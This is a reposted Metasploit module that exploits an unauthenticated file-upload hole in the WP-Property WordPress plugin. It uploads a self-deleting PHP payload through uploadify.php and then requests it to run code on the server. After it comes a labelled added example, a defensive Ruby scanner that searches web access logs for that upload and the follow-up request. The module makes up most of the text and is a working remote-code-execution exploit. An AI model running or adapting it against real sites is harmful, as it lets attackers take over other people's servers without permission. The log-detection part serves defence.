WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I mean msf.
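
Added example (not part of the original post or of the Metasploit module): a web access log check for the two requests the module makes, a POST to uploadify.php and then a GET for a .php file in the same uploadify directory. The combined log format, the sample lines and the name scan_access_log are assumptions constructed for illustration.

```ruby
# Added example: find the upload and the follow-up request in an access log.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
HANDLER       = UPLOADIFY_DIR + 'uploadify.php'

# Assumed common/combined log format:
#   ip - - [time] "METHOD target HTTP/x" status size
LINE_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /

def scan_access_log(lines)
  uploaders = {}   # client IPs that have POSTed to the upload handler
  findings  = []
  lines.each do |line|
    m = LINE_RE.match(line) or next
    ip, time, method, target, status = m.captures
    path = target.split('?', 2).first          # ignore the query string
    idx  = path.index(UPLOADIFY_DIR) or next   # only the uploadify directory
    file = path[(idx + UPLOADIFY_DIR.length)..-1]
    if method == 'POST' && path.end_with?(HANDLER)
      uploaders[ip] = true
      findings << { type: :upload_attempt, ip: ip, time: time, status: status.to_i }
    elsif file =~ /\.php\z/i && file.downcase != 'uploadify.php'
      # Any PHP file here other than the handler itself is unexpected.
      findings << { type: :php_in_upload_dir, ip: ip, time: time, path: path,
                    status: status.to_i, after_upload: uploaders.key?(ip) }
    end
  end
  findings
end

# Constructed sample lines (documentation IP ranges, made-up file name).
BASE = '/wordpress/' + UPLOADIFY_DIR
SAMPLE_LOG = [
  %(203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET #{BASE}uploadify.php HTTP/1.1" 200 0),
  %(203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST #{BASE}uploadify.php HTTP/1.1" 200 71),
  %(203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET #{BASE}AbCdE.php HTTP/1.1" 200 0),
  %(198.51.100.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120)
].freeze

if __FILE__ == $0
  scan_access_log(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

A php_in_upload_dir finding with after_upload set and a 200 status is the pair to investigate first; the payload in the module deletes itself, so the file may no longer be on disk.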